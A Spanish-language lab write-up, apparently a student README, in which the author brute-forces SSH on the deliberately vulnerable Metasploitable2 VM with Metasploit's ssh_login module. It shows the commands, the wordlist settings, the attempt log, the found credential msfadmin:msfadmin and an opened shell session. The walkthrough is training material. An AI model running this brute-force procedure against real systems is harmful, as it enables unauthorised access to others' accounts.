# Escaneo SSH en Metasploitable2 usando Metasploit

Este repositorio documenta el proceso de escaneo de fuerza bruta sobre el servicio SSH de la máquina **Metasploitable2**, utilizando el módulo `scanner/ssh/ssh_login` de Metasploit.

---

## Comandos ejecutados y descripción

Busca módulos relacionados con SSH en la base de datos de Metasploit.
search ssh login
Muestra todas las opciones configurables del módulo seleccionado.
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Define el objetivo del ataque de fuerza bruta.
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.149.144
RHOSTS => 192.168.149.144
Especifica el archivo que contiene la lista de nombres de usuario a probar.
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/x/usuarios.txtUSER_FILE => /home/x/usuarios.txt
Especifica el archivo con las contraseñas a probar.
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/x/contra.txt
PASS_FILE => /home/jenn/contra.txt
Activa el modo detallado para ver el progreso del ataque.
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true

Inicia el ataque de fuerza bruta.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.149.144:22 - Starting bruteforce
[-] 192.168.149.144:22 - Failed: 'msfadmin:hello'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.149.144:22 - Failed: 'msfadmin:botton'
[-] 192.168.149.144:22 - Failed: 'msfadmin:admin123'
[-] 192.168.149.144:22 - Failed: 'msfadmin:admin'
[-] 192.168.149.144:22 - Failed: 'msfadmin:root'
[-] 192.168.149.144:22 - Failed: 'msfadmin:toor'
[+] 192.168.149.144:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) 
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux'

Se encontró una credencial válida: msfadmin:msfadmin.

Después de obtener las credenciales, se procede a establecer una sesión interactiva con el sistema remoto.

sf6 auxiliary(scanner/ssh/ssh_login) > sessions -l 1

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH usuario @   192.168.149.146:41023 -> 192.168.149.144:22
                                       (192.168.149.144)

Inicia la sesión SSH con la máquina comprometida.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
ls
vulnerable
